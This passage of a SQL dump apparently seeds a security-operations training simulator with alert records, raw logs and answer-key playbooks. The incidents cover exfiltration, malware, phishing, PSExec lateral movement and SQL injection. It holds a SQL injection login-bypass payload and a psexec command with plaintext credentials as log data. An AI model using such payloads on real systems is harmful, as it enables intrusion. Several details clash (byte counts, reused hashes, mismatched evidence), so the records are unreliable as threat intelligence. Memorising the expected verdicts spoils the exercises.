administrative privileges.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(832, 'Data Exfiltration and Encryption - Step 3', 'critical', 'Data flow monitoring', 'During the ongoing attack operation, an unauthorized data transfer was detected from the internal network to an external IP. 700GB of sensitive data was exfiltrated before ransomware encryption commenced. The attack was aimed at disrupting HSE\'s operations.', 'Data Exfiltration', 'T1020', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-20T14:23:45Z\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"bytes_sent\":750000000,\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"confidential_data_export.zip\",\"username\":\"jdoe\",\"action\":\"data_transfer\",\"status\":\"Success\"}', '2026-01-13 01:56:44', '2026-02-16 17:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash corresponds to a large archive potentially containing sensitive data.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data_export.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"File name matches patterns of unauthorized data exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Active employee with access to sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":750000000,\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"confidential_data_export.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":750000000,\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"confidential_data_export.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":750000000,\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"confidential_data_export.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":750000000,\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"confidential_data_export.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":750000000,\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"confidential_data_export.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"status\\\":\\\"Success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(833, 'Critical Malware Execution Detected on Linux Server', 'critical', 'Syslog', 'A potentially malicious binary was executed on a Linux server. The file hash is associated with known malware.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T03:45:18Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"webadmin\",\"hostname\":\"server01\",\"command_line\":\"/usr/bin/python3 /tmp/malicious_script.py\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-14 15:19:37', '2026-02-16 17:57:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"/usr/bin/python3 /tmp/malicious_script.py\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known Python-based malware script\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with multiple malware families\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The hash and command line execution are indicative of a malware infection. Immediate action is required.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.492Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T03:45:18Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /tmp/malicious_script.py\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.492Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T03:45:18Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /tmp/malicious_script.py\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.492Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T03:45:18Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /tmp/malicious_script.py\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.492Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T03:45:18Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /tmp/malicious_script.py\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.492Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T03:45:18Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /tmp/malicious_script.py\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(834, 'Potential Phishing Email Detected with Malicious URL', 'high', 'Proofpoint', 'An email was received containing a URL linked to a known phishing campaign.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-14T07:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"192.168.2.20\",\"username\":\"jdoe\",\"hostname\":\"user-pc\",\"email_sender\":\"info@fakebank.com\",\"url\":\"http://malicious-link.com/login\"}', '2026-01-14 15:19:37', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"info@fakebank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Email domain spoofing legitimate banking services\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL involved in phishing attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and URL are part of a well-known phishing campaign targeting financial services.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Potential Phishing Email Detected with Malicious URL\",\"date\":\"2026-02-01T20:32:22.494Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(835, 'Suspicious Internal Lateral Movement Detected via PSExec', 'medium', 'Wazuh', 'PSExec tool used for potential unauthorized lateral movement within the network.', 'Lateral Movement', 'T1077', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-14T09:10:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.20\",\"username\":\"admin\",\"hostname\":\"workstation02\",\"command_line\":\"psexec \\\\\\\\192.168.1.20 -u admin -p password cmd\"}', '2026-01-14 15:19:37', '2026-03-11 01:23:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.1.20 -u admin -p password cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"PSExec usage is often associated with lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec with admin credentials suggests unauthorized lateral movement.\"}', 'Intermediate', 'EDR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.495Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:10:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"workstation02\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.495Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:10:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"workstation02\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.495Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:10:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"workstation02\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.495Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:10:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"workstation02\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.495Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:10:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"workstation02\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(836, 'Data Exfiltration Attempt via Suspicious External Connection', 'high', 'IDS/IPS', 'A connection was established to an external IP known for data exfiltration activities.', 'Data Exfil', 'T1048', 1, 'investigating', NULL, '{\"timestamp\":\"2026-01-14T12:22:11Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"198.51.100.10\",\"username\":\"nsmith\",\"hostname\":\"laptop01\"}', '2026-01-14 15:19:37', '2026-03-11 01:23:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple data exfiltration incidents\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is known for data exfiltration, indicating a serious breach attempt.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:22:11Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"nsmith\\\",\\\"hostname\\\":\\\"laptop01\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:22:11Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"nsmith\\\",\\\"hostname\\\":\\\"laptop01\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:22:11Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"nsmith\\\",\\\"hostname\\\":\\\"laptop01\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:22:11Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"nsmith\\\",\\\"hostname\\\":\\\"laptop01\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:22:11Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"nsmith\\\",\\\"hostname\\\":\\\"laptop01\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(837, 'SQL Injection Attempt Detected on Web Server', 'critical', 'Linux Server', 'An SQL injection attempt was detected in a web request targeting the main web server.', 'Web Attack', 'T1190', 0, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T14:55:32Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.75\",\"dst_ip\":\"192.168.1.50\",\"username\":\"\",\"hostname\":\"web-server\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"url\":\"http://example.com/login\"}', '2026-01-14 15:19:37', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://example.com/login\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Potential target for SQL injection\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload is a classic SQL injection attempt, requiring immediate remediation.\"}', 'Intermediate', 'SIEM', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.497Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T14:55:32Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.75\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://example.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.497Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T14:55:32Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.75\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://example.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.497Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T14:55:32Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.75\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://example.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.497Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T14:55:32Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.75\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://example.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.497Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T14:55:32Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.75\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://example.com/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
